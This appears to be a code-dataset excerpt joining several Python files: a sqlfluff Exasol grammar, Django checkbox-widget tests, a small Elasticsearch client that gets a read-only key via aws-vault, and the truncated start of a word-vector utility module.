Sequence("SELECT", "ANY", "DICTIONARY"),
Sequence(OneOf("CREATE", "DROP"), "ANY", "VIEW"),
Sequence(
OneOf("CREATE", "DROP", "EXECUTE"), "ANY", OneOf("SCRIPT", "FUNCTION")
),
"IMPORT",
"EXPORT",
)
@exasol_dialect.segment()
class ObjectPrivilegesSegment(BaseSegment):
"""Object privileges.
https://docs.exasol.com/database_concepts/privileges/details_rights_management.htm#System_Privileges
"""
type = "object_privilege"
match_grammar = OneOf(
"ALTER",
"SELECT",
"INSERT",
"UPDATE",
"DELETE",
"REFERENCES",
"EXECUTE",
# Revoke only
"IMPORT",
"EXPORT",
)
############################
# SKYLINE
############################
@exasol_dialect.segment()
class PreferringClauseSegment(BaseSegment):
"""`PREFERRING` clause of the Exasol Skyline extension.
https://docs.exasol.com/advanced_analytics/skyline.htm#preferring_clause
"""
type = "preferring_clause"
match_grammar = StartsWith(
"PREFERRING",
terminator=OneOf(
"LIMIT",
Sequence("GROUP", "BY"),
Sequence("ORDER", "BY"),
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence(
"PREFERRING",
OptionallyBracketed(Ref("PreferringPreferenceTermSegment")),
Ref("PartitionClauseSegment", optional=True),
)
@exasol_dialect.segment()
class PreferringPreferenceTermSegment(BaseSegment):
"""The preference term of a `PREFERRING` clause."""
type = "preference_term"
match_grammar = Sequence(
OneOf(
Sequence(
OneOf("HIGH", "LOW"),
OneOf(
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("ColumnReferenceSegment"),
),
),
OneOf(
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("ColumnReferenceSegment"),
),
),
Ref("PreferringPlusPriorTermSegment", optional=True),
)
@exasol_dialect.segment()
class PreferringPlusPriorTermSegment(BaseSegment):
"""The `PLUS` / `PRIOR TO` or `INVERSE` term within a preferring preference term expression."""
type = "plus_prior_inverse"
match_grammar = OneOf(
Sequence(
Sequence(
OneOf(
"PLUS",
Sequence("PRIOR", "TO"),
),
Ref("PreferringPreferenceTermSegment"),
optional=True,
),
),
Sequence(
"INVERSE",
Ref("PreferringPreferenceTermSegment"),
),
)
@exasol_dialect.segment(replace=True)
class MLTableExpressionSegment(BaseSegment):
"""Not supported."""
match_grammar = Nothing()
############################
# SYSTEM
############################
@exasol_dialect.segment()
class AlterSessionSegment(BaseSegment):
"""`ALTER SESSION` statement."""
type = "alter_session_statement"
match_grammar = Sequence(
"ALTER",
"SESSION",
"SET",
Ref("SessionParameterSegment"),
Ref("EqualsSegment"),
OneOf(Ref("QuotedLiteralSegment"), Ref("NumericLiteralSegment")),
)
@exasol_dialect.segment()
class AlterSystemSegment(BaseSegment):
"""`ALTER SYSTEM` statement."""
type = "alter_system_statement"
match_grammar = Sequence(
"ALTER",
"SYSTEM",
"SET",
Ref("SystemParameterSegment"),
Ref("EqualsSegment"),
OneOf(Ref("QuotedLiteralSegment"), Ref("NumericLiteralSegment")),
)
@exasol_dialect.segment()
class OpenSchemaSegment(BaseSegment):
"""`OPEN SCHEMA` statement."""
type = "open_schema_statement"
match_grammar = Sequence("OPEN", "SCHEMA", Ref("SchemaReferenceSegment"))
@exasol_dialect.segment()
class CloseSchemaSegment(BaseSegment):
"""`CLOSE SCHEMA` statement."""
type = "close_schema_statement"
match_grammar = Sequence("CLOSE", "SCHEMA")
@exasol_dialect.segment()
class FlushStatisticsSegment(BaseSegment):
"""`FLUSH STATISTICS` statement."""
type = "flush_statistics_statement"
match_grammar = Sequence("FLUSH", "STATISTICS")
@exasol_dialect.segment()
class RecompressReorganizeSegment(BaseSegment):
    """`RECOMPRESS` and `REORGANIZE` statement."""

    type = "recompress_reorganize_statement"
    match_grammar = Sequence(
        OneOf("RECOMPRESS", "REORGANIZE"),
        # Target: a single table (optionally restricted to columns), a list of
        # tables, one or more schemas, or the whole database.
        OneOf(
            Sequence(
                "TABLE",
                Ref("TableReferenceSegment"),
                Ref("BracketedColumnReferenceListGrammar"),
            ),
            Sequence("TABLES", Delimited(Ref("TableReferenceSegment"))),
            Sequence("SCHEMA", Ref("SchemaReferenceSegment")),
            Sequence("SCHEMAS", Delimited(Ref("SchemaReferenceSegment"))),
            "DATABASE",
        ),
        # Optional trailing ENFORCE keyword.
        Ref.keyword("ENFORCE", optional=True),
    )
@exasol_dialect.segment()
class PreloadSegment(BaseSegment):
"""`PRELOAD` statement."""
type = "preload_statement"
match_grammar = Sequence(
"PRELOAD",
OneOf(
Sequence(
"TABLE",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar"),
),
Sequence("TABLES", Delimited(Ref("TableReferenceSegment"))),
Sequence("SCHEMA", Ref("SchemaReferenceSegment")),
Sequence("SCHEMAS", Delimited(Ref("SchemaReferenceSegment"))),
"DATABASE",
),
)
@exasol_dialect.segment()
class ImpersonateSegment(BaseSegment):
"""`IMPERSONATE` statement."""
type = "impersonate_statement"
match_grammar = Sequence("IMPERSONATE", Ref("SingleIdentifierGrammar"))
@exasol_dialect.segment()
class KillSegment(BaseSegment):
    """`KILL` statement.

    Covers both the `KILL SESSION` and the `KILL STATEMENT ... IN SESSION ...`
    variants.
    """

    type = "kill_statement"
    match_grammar = StartsWith("KILL")
    parse_grammar = Sequence(
        "KILL",
        OneOf(
            # KILL SESSION (CURRENT_SESSION | <session_id>)
            Sequence("SESSION", OneOf("CURRENT_SESSION", Ref("NumericLiteralSegment"))),
            # KILL STATEMENT [<stmt_id>] IN SESSION <session_id>
            #     [WITH MESSAGE '<text>']
            Sequence(
                "STATEMENT",
                Ref("NumericLiteralSegment", optional=True),
                "IN",
                "SESSION",
                Ref("NumericLiteralSegment"),
                Sequence("WITH", "MESSAGE", Ref("QuotedLiteralSegment"), optional=True),
            ),
        ),
    )
@exasol_dialect.segment()
class TruncateAuditLogsSegment(BaseSegment):
"""`TRUNCATE AUDIT LOGS` statement."""
type = "truncate_audit_logs_statement"
match_grammar = StartsWith(Sequence("TRUNCATE", "AUDIT", "LOGS"))
parse_grammar = Sequence(
"TRUNCATE",
"AUDIT",
"LOGS",
Sequence(
"KEEP",
OneOf(
Sequence("LAST", OneOf("DAY", "MONTH", "YEAR")),
Sequence("FROM", Ref("QuotedLiteralSegment")),
),
optional=True,
),
)
############################
# OTHERS
############################
@exasol_dialect.segment(replace=True)
class TransactionStatementSegment(BaseSegment):
"""A `COMMIT` or `ROLLBACK` statement."""
type = "transaction_statement"
match_grammar = Sequence(
OneOf("COMMIT", "ROLLBACK"), Ref.keyword("WORK", optional=True)
)
@exasol_dialect.segment()
class ExecuteScriptSegment(BaseSegment):
"""`EXECUTE SCRIPT` statement."""
type = "execute_script_statement"
match_grammar = Sequence(
"EXECUTE",
"SCRIPT",
Ref("ScriptReferenceSegment"),
Bracketed(
Delimited(Ref.keyword("ARRAY", optional=True), Ref("ExpressionSegment")),
optional=True,
),
Sequence("WITH", "OUTPUT", optional=True),
)
@exasol_dialect.segment()
class ExplainVirtualSegment(BaseSegment):
"""`EXPLAIN VIRTUAL` statement."""
type = "explain_virtual_statement"
match_grammar = Sequence("EXPLAIN", "VIRTUAL", Ref("SelectableGrammar"))
############################
# FUNCTION
############################
@exasol_dialect.segment()
class FunctionReferenceSegment(exasol_dialect.get_segment("ObjectReferenceSegment")): # type: ignore
"""A reference to a function."""
type = "function_reference"
@exasol_dialect.segment(replace=True)
class CreateFunctionStatementSegment(BaseSegment):
"""A `CREATE FUNCTION` statement."""
type = "create_function_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
"FUNCTION",
),
terminator=Ref("FunctionScriptTerminatorSegment"),
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
"FUNCTION",
Ref("FunctionReferenceSegment"),
Bracketed(
Delimited(
Sequence(
Ref("SingleIdentifierGrammar"), # Column name
Ref.keyword("IN", optional=True),
Ref("DatatypeSegment"), # Column type
),
optional=True,
),
),
"RETURN",
Ref("DatatypeSegment"),
OneOf("IS", "AS", optional=True),
AnyNumberOf(
Sequence(
Ref("VariableNameSegment"),
Ref("DatatypeSegment"),
Ref("DelimiterSegment"),
),
optional=True,
),
"BEGIN",
AnyNumberOf(Ref("FunctionBodySegment")),
"RETURN",
Ref("FunctionContentsExpressionGrammar"),
Ref("DelimiterSegment"),
"END",
Ref("FunctionReferenceSegment", optional=True),
Ref("SemicolonSegment", optional=True),
)
@exasol_dialect.segment()
class FunctionBodySegment(BaseSegment):
"""The definition of the function body."""
type = "function_body"
match_grammar = OneOf(
Ref("FunctionAssignmentSegment"),
Ref("FunctionIfBranchSegment"),
Ref("FunctionForLoopSegment"),
Ref("FunctionWhileLoopSegment"),
)
@exasol_dialect.segment()
class FunctionAssignmentSegment(BaseSegment):
    """The definition of an assignment within a function body."""

    type = "function_assignment"
    match_grammar = Sequence(
        # assignment: <variable> := <value> ;
        Ref("VariableNameSegment"),
        Ref("WalrusOperatorSegment"),  # the `:=` assignment operator
        OneOf(
            Ref("FunctionSegment"),
            Ref("VariableNameSegment"),
            Ref("LiteralGrammar"),
            Ref("ExpressionSegment"),
        ),
        Ref("SemicolonSegment"),
    )
@exasol_dialect.segment()
class FunctionIfBranchSegment(BaseSegment):
    """The definition of an if branch within a function body."""

    type = "function_if_branch"
    match_grammar = Sequence(
        "IF",
        AnyNumberOf(Ref("ExpressionSegment")),
        "THEN",
        AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
        # Any number of ELSIF / ELSEIF branches, each with its own body.
        AnyNumberOf(
            Sequence(
                OneOf("ELSIF", "ELSEIF"),
                Ref("ExpressionSegment"),
                "THEN",
                AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
            ),
            optional=True,
        ),
        # Optional ELSE branch.
        Sequence(
            "ELSE", AnyNumberOf(Ref("FunctionBodySegment"), min_times=1), optional=True
        ),
        "END",
        "IF",
        Ref("SemicolonSegment"),
    )
@exasol_dialect.segment()
class FunctionForLoopSegment(BaseSegment):
"""The definition of a for loop within a function body."""
type = "function_for_loop"
match_grammar = Sequence(
"FOR",
Ref("NakedIdentifierSegment"),
OneOf(
# # for x := 1 to 10 do...
Sequence(
Ref("WalrusOperatorSegment"),
Ref("ExpressionSegment"), # could be a variable
"TO",
Ref("ExpressionSegment"), # could be a variable
"DO",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
"END",
"FOR",
),
# for x IN 1..10...
Sequence(
"IN",
Ref("ExpressionSegment"), # could be a variable
Ref("RangeOperator"),
Ref("ExpressionSegment"), # could be a variable
"LOOP",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
"END",
"LOOP",
),
),
Ref("SemicolonSegment"),
)
@exasol_dialect.segment()
class FunctionWhileLoopSegment(BaseSegment):
"""The definition of a while loop within a function body."""
type = "function_while_loop"
match_grammar = Sequence(
"WHILE",
Ref("ExpressionSegment"),
"DO",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
"END",
"WHILE",
Ref("SemicolonSegment"),
)
@exasol_dialect.segment(replace=True)
class FunctionSegment(BaseSegment):
"""A scalar or aggregate function.
Maybe in the future we should distinguish between
aggregate functions and other functions. For now
we treat them the same because they look the same
for our purposes.
"""
type = "function"
match_grammar = OneOf(
Sequence(
Sequence(
Ref("DatePartFunctionNameSegment"),
Bracketed(
Ref(
"FunctionContentsGrammar",
# The brackets might be empty for some functions...
optional=True,
ephemeral_name="FunctionContentsGrammar",
),
),
),
Ref("PostFunctionGrammar", optional=True),
),
Sequence(
Sequence(
AnyNumberOf(
Ref("FunctionNameSegment"),
max_times=1,
min_times=1,
exclude=Ref("DatePartFunctionNameSegment"),
),
Bracketed(
Ref(
"FunctionContentsGrammar",
# The brackets might be empty for some functions...
optional=True,
ephemeral_name="FunctionContentsGrammar",
)
),
),
Ref("PostFunctionGrammar", optional=True),
),
)
@exasol_dialect.segment(replace=True)
class DatePartFunctionNameSegment(BaseSegment):
"""DATEADD function name segment.
Need to be able to specify this as type function_name
so that linting rules identify it properly
"""
type = "function_name"
match_grammar = OneOf(
"ADD_DAYS",
"ADD_HOURS",
"ADD_MINUTES",
"ADD_MONTHS",
"ADD_SECONDS",
"ADD_WEEKS",
"ADD_YEARS",
)
############################
# SCRIPT
############################
@exasol_dialect.segment()
class ScriptReferenceSegment(exasol_dialect.get_segment("ObjectReferenceSegment")): # type: ignore
"""A reference to a script."""
type = "script_reference"
@exasol_dialect.segment()
class ScriptContentSegment(BaseSegment):
"""This represents the script content.
Because the script content could be written in
LUA, PYTHON, JAVA or R there is no further verification.
"""
type = "script_content"
match_grammar = Anything()
@exasol_dialect.segment()
class CreateScriptingLuaScriptStatementSegment(BaseSegment):
"""`CREATE SCRIPT` statement to create a Lua scripting script.
https://docs.exasol.com/sql/create_script.htm
"""
type = "create_scripting_lua_script"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("LUA", optional=True),
"SCRIPT",
),
terminator=Ref("FunctionScriptTerminatorSegment"),
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("LUA", optional=True),
"SCRIPT",
Ref("ScriptReferenceSegment"),
Bracketed(
Delimited(
Sequence(
Ref.keyword("ARRAY", optional=True), Ref("SingleIdentifierGrammar")
),
optional=True,
),
optional=True,
),
Sequence(Ref.keyword("RETURNS"), OneOf("TABLE", "ROWCOUNT"), optional=True),
"AS",
Indent,
Ref("ScriptContentSegment"),
Dedent,
)
@exasol_dialect.segment()
class CreateUDFScriptStatementSegment(BaseSegment):
    """`CREATE SCRIPT` statement to create a UDF script.

    https://docs.exasol.com/sql/create_script.htm
    """

    type = "create_udf_script"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(
        Sequence(
            "CREATE",
            Ref("OrReplaceGrammar", optional=True),
            # The script-language prefix is optional.
            OneOf(
                "JAVA",
                "PYTHON",
                "LUA",
                "R",
                Ref("SingleIdentifierGrammar"),
                optional=True,
            ),
            OneOf("SCALAR", "SET"),
            "SCRIPT",
        )
    )
    parse_grammar = Sequence(
        "CREATE",
        Ref("OrReplaceGrammar", optional=True),
        OneOf(
            "JAVA", "PYTHON", "LUA", "R", Ref("SingleIdentifierGrammar"), optional=True
        ),
        OneOf("SCALAR", "SET"),
        "SCRIPT",
        Ref("ScriptReferenceSegment"),
        # Parameter list, optionally followed by an ORDER BY clause.
        Bracketed(
            Sequence(
                Ref("UDFParameterGrammar"),
                Ref("OrderByClauseSegment", optional=True),
                optional=True,
            ),
        ),
        # Either RETURNS <type> or an EMITS clause.
        OneOf(Sequence("RETURNS", Ref("DatatypeSegment")), Ref("EmitsGrammar")),
        "AS",
        Indent,
        Ref("ScriptContentSegment"),
        Dedent,
    )
@exasol_dialect.segment()
class CreateAdapterScriptStatementSegment(BaseSegment):
    """`CREATE SCRIPT` statement to create an adapter script.

    https://docs.exasol.com/sql/create_script.htm
    """

    type = "create_adapter_script"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(
        Sequence(
            "CREATE",
            Ref("OrReplaceGrammar", optional=True),
            OneOf("JAVA", "PYTHON", Ref("SingleIdentifierGrammar"), optional=True),
            "ADAPTER",
            "SCRIPT",
        )
    )
    parse_grammar = Sequence(
        "CREATE",
        Ref("OrReplaceGrammar", optional=True),
        OneOf("JAVA", "PYTHON", Ref("SingleIdentifierGrammar"), optional=True),
        "ADAPTER",
        "SCRIPT",
        Ref("ScriptReferenceSegment"),
        "AS",
        Indent,
        # The script body is treated as unparsed content (see
        # ScriptContentSegment).
        Ref("ScriptContentSegment"),
        Dedent,
    )
############################
# DIALECT
############################
@exasol_dialect.segment()
class FunctionScriptStatementSegment(BaseSegment):
"""A generic segment, to any of its child subsegments."""
type = "statement"
match_grammar = OneOf(
Ref("CreateFunctionStatementSegment"),
Ref("CreateScriptingLuaScriptStatementSegment"),
Ref("CreateUDFScriptStatementSegment"),
Ref("CreateAdapterScriptStatementSegment"),
)
@exasol_dialect.segment(replace=True)
class StatementSegment(BaseSegment):
"""A generic segment, to any of its child subsegments."""
type = "statement"
match_grammar = GreedyUntil(Ref("SemicolonSegment"))
parse_grammar = OneOf(
# Data Query Language (DQL)
Ref("SelectableGrammar"),
# Data Modifying Language (DML)
Ref("DeleteStatementSegment"),
Ref("ExportStatementSegment"),
Ref("ImportStatementSegment"),
Ref("InsertStatementSegment"),
Ref("MergeStatementSegment"),
Ref("TruncateStatementSegment"),
Ref("UpdateStatementSegment"),
# Data Definition Language (DDL)
Ref("AlterTableStatementSegment"),
Ref("AlterSchemaStatementSegment"),
Ref("AlterVirtualSchemaStatementSegment"),
Ref("CommentStatementSegment"),
Ref("CreateSchemaStatementSegment"),
Ref("CreateTableStatementSegment"),
Ref("CreateViewStatementSegment"),
Ref("CreateVirtualSchemaStatementSegment"),
Ref("DropStatementSegment"),
Ref("RenameStatementSegment"),
# Access Control Language (DCL)
Ref("AccessStatementSegment"),
Ref("AlterConnectionSegment"),
Ref("AlterUserSegment"),
Ref("CreateConnectionSegment"),
Ref("CreateRoleSegment"),
Ref("CreateUserSegment"),
# System
Ref("CreateConsumerGroupSegment"),
Ref("AlterConsumerGroupSegment"),
Ref("AlterRoleSegment"),
Ref("AlterSessionSegment"),
Ref("AlterSystemSegment"),
Ref("OpenSchemaSegment"),
Ref("CloseSchemaSegment"),
Ref("FlushStatisticsSegment"),
Ref("ImpersonateSegment"),
Ref("RecompressReorganizeSegment"),
Ref("KillSegment"),
Ref("PreloadSegment"),
Ref("TruncateAuditLogsSegment"),
Ref("ExplainVirtualSegment"),
# Others
Ref("TransactionStatementSegment"),
Ref("ExecuteScriptSegment"),
)
@exasol_dialect.segment(replace=True)
class FileSegment(BaseFileSegment):
    """This overwrites the FileSegment from the ANSI dialect.

    The reason is that SCRIPT and FUNCTION statements are terminated
    by a trailing `/` at the end, while a semicolon is the terminator of
    the statements within the function / script body.
    """

    parse_grammar = AnyNumberOf(
        # `/`-terminated function / script definitions ...
        Delimited(
            Ref("FunctionScriptStatementSegment"),
            delimiter=Ref("FunctionScriptTerminatorSegment"),
            allow_gaps=True,
            allow_trailing=True,
        ),
        # ... and ordinary `;`-terminated statements.
        Delimited(
            Ref("StatementSegment"),
            delimiter=Ref("DelimiterSegment"),
            allow_gaps=True,
            allow_trailing=True,
        ),
    )
| 27.545722 | 107 | 0.544549 |
95bb8eddb28a6ef920ed62f599ee10b3e6c61265 | 8,690 | py | Python | tests/forms_tests/widget_tests/test_checkboxselectmultiple.py | peteralexandercharles/django | 61c7350f41f2534daf3888709f3c987b7d779a29 | [
"BSD-3-Clause",
"0BSD"
] | null | null | null | tests/forms_tests/widget_tests/test_checkboxselectmultiple.py | peteralexandercharles/django | 61c7350f41f2534daf3888709f3c987b7d779a29 | [
"BSD-3-Clause",
"0BSD"
] | null | null | null | tests/forms_tests/widget_tests/test_checkboxselectmultiple.py | peteralexandercharles/django | 61c7350f41f2534daf3888709f3c987b7d779a29 | [
"BSD-3-Clause",
"0BSD"
] | null | null | null | import datetime
from django import forms
from django.forms import CheckboxSelectMultiple
from django.test import override_settings
from .base import WidgetTest
class CheckboxSelectMultipleTest(WidgetTest):
    """Tests for rendering and behavior of the CheckboxSelectMultiple widget."""

    widget = CheckboxSelectMultiple

    def test_render_value(self):
        """A single selected value checks only the matching checkbox."""
        self.check_html(
            self.widget(choices=self.beatles),
            "beatles",
            ["J"],
            html=(
                """<ul>
<li><label><input checked type="checkbox" name="beatles" value="J"> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P"> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G"> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R"> Ringo</label></li>
</ul>"""
            ),
        )

    def test_render_value_multiple(self):
        """Multiple selected values check each matching checkbox."""
        self.check_html(
            self.widget(choices=self.beatles),
            "beatles",
            ["J", "P"],
            html=(
                """<ul>
<li><label><input checked type="checkbox" name="beatles" value="J"> John</label></li>
<li><label><input checked type="checkbox" name="beatles" value="P"> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G"> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R"> Ringo</label></li>
</ul>"""
            ),
        )

    def test_render_none(self):
        """
        If the value is None, none of the options are selected, even if the
        choices have an empty option.
        """
        self.check_html(
            self.widget(choices=(("", "Unknown"),) + self.beatles),
            "beatles",
            None,
            html=(
                """<ul>
<li><label><input type="checkbox" name="beatles" value=""> Unknown</label></li>
<li><label><input type="checkbox" name="beatles" value="J"> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P"> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G"> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R"> Ringo</label></li>
</ul>"""
            ),
        )

    def test_nested_choices(self):
        """Grouped choices render as nested <ul> lists with per-input ids."""
        nested_choices = (
            ("unknown", "Unknown"),
            ("Audio", (("vinyl", "Vinyl"), ("cd", "CD"))),
            ("Video", (("vhs", "VHS"), ("dvd", "DVD"))),
        )
        html = """
        <ul id="media">
        <li>
        <label for="media_0"><input id="media_0" name="nestchoice" type="checkbox" value="unknown"> Unknown</label>
        </li>
        <li>Audio<ul id="media_1">
        <li>
        <label for="media_1_0">
        <input checked id="media_1_0" name="nestchoice" type="checkbox" value="vinyl"> Vinyl
        </label>
        </li>
        <li>
        <label for="media_1_1"><input id="media_1_1" name="nestchoice" type="checkbox" value="cd"> CD</label>
        </li>
        </ul></li>
        <li>Video<ul id="media_2">
        <li>
        <label for="media_2_0"><input id="media_2_0" name="nestchoice" type="checkbox" value="vhs"> VHS</label>
        </li>
        <li>
        <label for="media_2_1">
        <input checked id="media_2_1" name="nestchoice" type="checkbox" value="dvd"> DVD
        </label>
        </li>
        </ul></li>
        </ul>
        """
        self.check_html(
            self.widget(choices=nested_choices),
            "nestchoice",
            ("vinyl", "dvd"),
            attrs={"id": "media"},
            html=html,
        )

    def test_nested_choices_without_id(self):
        """Without a widget id, nested choices render inputs with no id/for attrs."""
        nested_choices = (
            ("unknown", "Unknown"),
            ("Audio", (("vinyl", "Vinyl"), ("cd", "CD"))),
            ("Video", (("vhs", "VHS"), ("dvd", "DVD"))),
        )
        html = """
        <ul>
        <li>
        <label><input name="nestchoice" type="checkbox" value="unknown"> Unknown</label>
        </li>
        <li>Audio<ul>
        <li>
        <label>
        <input checked name="nestchoice" type="checkbox" value="vinyl"> Vinyl
        </label>
        </li>
        <li>
        <label><input name="nestchoice" type="checkbox" value="cd"> CD</label>
        </li>
        </ul></li>
        <li>Video<ul>
        <li>
        <label><input name="nestchoice" type="checkbox" value="vhs"> VHS</label>
        </li>
        <li>
        <label>
        <input checked name="nestchoice" type="checkbox" value="dvd"> DVD
        </label>
        </li>
        </ul></li>
        </ul>
        """
        self.check_html(
            self.widget(choices=nested_choices),
            "nestchoice",
            ("vinyl", "dvd"),
            html=html,
        )

    def test_separate_ids(self):
        """
        Each input gets a separate ID.
        """
        choices = [("a", "A"), ("b", "B"), ("c", "C")]
        html = """
        <ul id="abc">
        <li>
        <label for="abc_0"><input checked type="checkbox" name="letters" value="a" id="abc_0"> A</label>
        </li>
        <li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1"> B</label></li>
        <li>
        <label for="abc_2"><input checked type="checkbox" name="letters" value="c" id="abc_2"> C</label>
        </li>
        </ul>
        """
        self.check_html(
            self.widget(choices=choices),
            "letters",
            ["a", "c"],
            attrs={"id": "abc"},
            html=html,
        )

    def test_separate_ids_constructor(self):
        """
        Each input gets a separate ID when the ID is passed to the constructor.
        """
        widget = CheckboxSelectMultiple(
            attrs={"id": "abc"}, choices=[("a", "A"), ("b", "B"), ("c", "C")]
        )
        html = """
        <ul id="abc">
        <li>
        <label for="abc_0"><input checked type="checkbox" name="letters" value="a" id="abc_0"> A</label>
        </li>
        <li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1"> B</label></li>
        <li>
        <label for="abc_2"><input checked type="checkbox" name="letters" value="c" id="abc_2"> C</label>
        </li>
        </ul>
        """
        self.check_html(widget, "letters", ["a", "c"], html=html)

    @override_settings(USE_L10N=True, USE_THOUSAND_SEPARATOR=True)
    def test_doesnt_localize_input_value(self):
        """Input values stay unlocalized (no thousand separators, ISO times)."""
        choices = [
            (1, "One"),
            (1000, "One thousand"),
            (1000000, "One million"),
        ]
        html = """
        <ul>
        <li><label><input type="checkbox" name="numbers" value="1"> One</label></li>
        <li><label><input type="checkbox" name="numbers" value="1000"> One thousand</label></li>
        <li><label><input type="checkbox" name="numbers" value="1000000"> One million</label></li>
        </ul>
        """
        self.check_html(self.widget(choices=choices), "numbers", None, html=html)
        choices = [
            (datetime.time(0, 0), "midnight"),
            (datetime.time(12, 0), "noon"),
        ]
        html = """
        <ul>
        <li><label><input type="checkbox" name="times" value="00:00:00"> midnight</label></li>
        <li><label><input type="checkbox" name="times" value="12:00:00"> noon</label></li>
        </ul>
        """
        self.check_html(self.widget(choices=choices), "times", None, html=html)

    def test_use_required_attribute(self):
        """use_required_attribute() is False for any value, per the comment below."""
        widget = self.widget(choices=self.beatles)
        # Always False because browser validation would require all checkboxes
        # to be checked instead of at least one.
        self.assertIs(widget.use_required_attribute(None), False)
        self.assertIs(widget.use_required_attribute([]), False)
        self.assertIs(widget.use_required_attribute(["J", "P"]), False)

    def test_value_omitted_from_data(self):
        """value_omitted_from_data() is always False for this widget."""
        widget = self.widget(choices=self.beatles)
        self.assertIs(widget.value_omitted_from_data({}, {}, "field"), False)
        self.assertIs(
            widget.value_omitted_from_data({"field": "value"}, {}, "field"), False
        )

    def test_label(self):
        """
        CheckboxSelectMultiple doesn't contain 'for="field_0"' in the <label>
        because clicking that would toggle the first checkbox.
        """

        class TestForm(forms.Form):
            f = forms.MultipleChoiceField(widget=CheckboxSelectMultiple)

        bound_field = TestForm()["f"]
        self.assertEqual(bound_field.field.widget.id_for_label("id"), "")
        self.assertEqual(bound_field.label_tag(), "<label>F:</label>")
426badcb4265d9e2dc3c669461097767254c2c46 | 1,474 | py | Python | elasticsearch.py | MingChen91/monitoring-scripts | acfe4bb74b90eef4112dbde9527db4cce90936be | [
"MIT"
] | null | null | null | elasticsearch.py | MingChen91/monitoring-scripts | acfe4bb74b90eef4112dbde9527db4cce90936be | [
"MIT"
] | null | null | null | elasticsearch.py | MingChen91/monitoring-scripts | acfe4bb74b90eef4112dbde9527db4cce90936be | [
"MIT"
] | null | null | null | import json
import subprocess
from collections import OrderedDict
from urllib import parse
import requests
class ElasticSearch:
    """Thin client that queries Elasticsearch through the Halter BFF debug-tool
    endpoint, authenticating with a read-only key from AWS Secrets Manager."""

    def __init__(self, env: str):
        """
        Connects to elastic search.

        Args:
            env (str): environment to connect to, dev, staging, prod
        """
        self.__env = env
        # Fetch the key once up-front; it is reused for every query.
        self.__read_only_key = self.__get_read_only_key()

    def query(self, query: str) -> dict:
        """
        Sends a string query to elastic search and returns the result
        """
        query_string = parse.urlencode(OrderedDict(esQuery=query))
        # Elastic search needs IP to be whitelisted, use halter bff service instead so can be used by anyone
        url = f"https://halter-core.{self.__env}.halter.io/v1/bff-debug-tool/device-metrics?{query_string}"
        payload = {}
        headers = {
            'Authorization': 'ReadOnly ' + self.__read_only_key
        }
        response = requests.request("GET", url, headers=headers, data=payload)
        # NOTE(review): assumes the endpoint always returns JSON; a non-JSON
        # error response would raise here — confirm desired behavior.
        response_json = json.loads(response.text)
        return response_json

    def __get_read_only_key(self) -> str:
        """Fetch the read-only support key from AWS Secrets Manager via aws-vault."""
        # NOTE(review): shell=True with an interpolated env string — safe only
        # while `env` comes from trusted callers (dev/staging/prod); confirm.
        output = subprocess.run(
            f"aws-vault exec halter-{self.__env} -- aws secretsmanager get-secret-value --secret-id halter/auth/readonly/support",
            shell=True, check=True, capture_output=True).stdout
        # The secret value itself is the raw key string.
        secret = json.loads(output)
        read_only_key = secret["SecretString"]
        return read_only_key
| 31.361702 | 130 | 0.643148 |
db3d070f287dcdcdf73733ba98058f8d08b8734f | 15,829 | py | Python | idiom/__init__.py | thorwhalen/idiom | 86789d3ec6061dcebc27273a116b914c0a900998 | [
"MIT"
] | 1 | 2022-01-19T13:15:23.000Z | 2022-01-19T13:15:23.000Z | idiom/__init__.py | thorwhalen/idiom | 86789d3ec6061dcebc27273a116b914c0a900998 | [
"MIT"
] | null | null | null | idiom/__init__.py | thorwhalen/idiom | 86789d3ec6061dcebc27273a116b914c0a900998 | [
"MIT"
] | null | null | null | """
Access to wordvec data and useful functions that use it.
"""
from functools import cached_property, partial, lru_cache
import re
from typing import Mapping, Any, Callable, Union, Iterable, Optional
from importlib_resources import files as package_files
from dataclasses import dataclass, field
from itertools import islice
from heapq import nlargest
from typing import Iterable, Callable, Union, Optional
import numpy as np
from sklearn.metrics.pairwise import cosine_distances
from sklearn.neighbors import NearestNeighbors
from sklearn.exceptions import NotFittedError
from py2store import Store
from py2store.slib.s_zipfile import FileStreamsOfZip, FilesOfZip
# from py2store.base import Stream
from creek import Creek
from creek.util import PreIter
# Data files bundled with the idiom package.
data_files = package_files('idiom.data')
# Official fastText English word vectors (1M words, 300 dims, subword info).
english_word2vec_url = (
    'https://dl.fbaipublicfiles.com/fasttext/vectors-english/'
    'wiki-news-300d-1M-subword.vec.zip'
)
# Bundled zip containing unigram_freq.csv ("word,count" rows).
word_frequency_posixpath = data_files.joinpath('english-word-frequency.zip')
def closest_words(
    word,
    k=10,
    search_words: Optional[Union[Callable, Iterable]] = None,
    vec_of_word=None,
):
